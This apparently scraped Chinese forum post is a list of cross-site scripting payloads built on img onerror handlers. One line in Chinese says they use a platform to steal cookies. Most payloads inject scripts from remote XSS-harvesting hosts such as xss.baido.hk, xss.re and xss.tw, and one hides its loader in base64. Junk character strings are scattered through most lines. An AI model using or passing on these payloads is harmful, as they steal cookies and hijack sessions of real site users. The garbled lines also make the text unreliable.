<img src='non-exist.jpg'onerror="alert('xss')">4 w) z, p' w4 Q- Y+ W
<img src=# onerror=alert(123)>$ W6 u# a9 r4 J0 f( I0 d5 q
<img src=# onerror=alert(document.cookie)>: P! W. X/ g! ^. L$ h9 f: _
下面是利用平台钓cookie的$ O" h y3 s! }! P. E# k% ^
<img src=x onerror=s=createElement("script");body.appendChild(s);s.src="http://xss.baido.hk/JnFrlW?1445149342";>+ j! v6 k h6 G( ?2 I4 m; M
/ r$ A4 Z3 I5 M9 g
6 K" E6 f: y6 k- p; w
<img src=x onerror=s=createElement('script');body.appendChild(s);s.src='你的js地址';>
! v) j5 ~; K" |" `/ j: I: i<img src=x onerror=with(document)body.appendChild(document.createElement(‘script‘)).src="//xss.re/974"></img>) v2 c2 @$ Y4 Q+ f
“><img src=x onerror=”with(document)body.appendChild(createElement(‘script’)).src=’//xss.re/974’”></img>: J- ~: P h, H# W k h6 j
<img src=1 onerror=jQuery.getScript("//xss.re/974")> $ d1 V, i" O- }1 K- a x, x
<img src="#">/ w) `/ B7 Q+ y v/ R6 Q, P
<img src="#">' k p. i) \: I: m' L: c
<img src=‘0‘ onerror=with(document)body.appendChild(createElement(‘script‘)).src=‘/xx‘>7 ~# L( m0 @) M6 S- S) Q
<img src="http://fs3u.dajie.com/2013/01/05/146/13573533461773126m.jpg" border="0">: f( j! U( z( J9 l' N$ O5 F9 k
<img src=i onerror=eval(jQuery.getScript(‘//xss.tw/4091‘))>
( a2 e! M! k6 @$ F) N% f<img src=N onerror=eval(javascript:document.write(unescape(‘ <script src="http://xxx.js"></script>‘));)>! \, S5 F: ^3 W, `) p" y8 L
<img src=x onerror=document.body.appendChild(document.createElement(‘script‘)).src=‘//xxx.xxx/a.js‘>
- b( B: L+ h2 w* r<img src=x width="0" height="0"></img>
. D; z0 O0 c. J( M1 Z<img src=1 onerror=eval(atob('cz1jcmVhdGVFbGVtZW50KCdzY3JpcHQnKTtzLnNyYz0naHR0cHM6Ly94Lnh4ZS5sYS9WSic7Ym9keS5hcHBlbmRDaGlsZChzKQ=='))>
! g- d3 R2 o. z6 j$ w. @! {; E<img src=x onerror=s=createElement('\x73cript');body.appendChild(s);s.src='http://xss.baido.hk/7OO7GQ?1510065652';>
S+ J) g- t( I+ u5 R/ _ |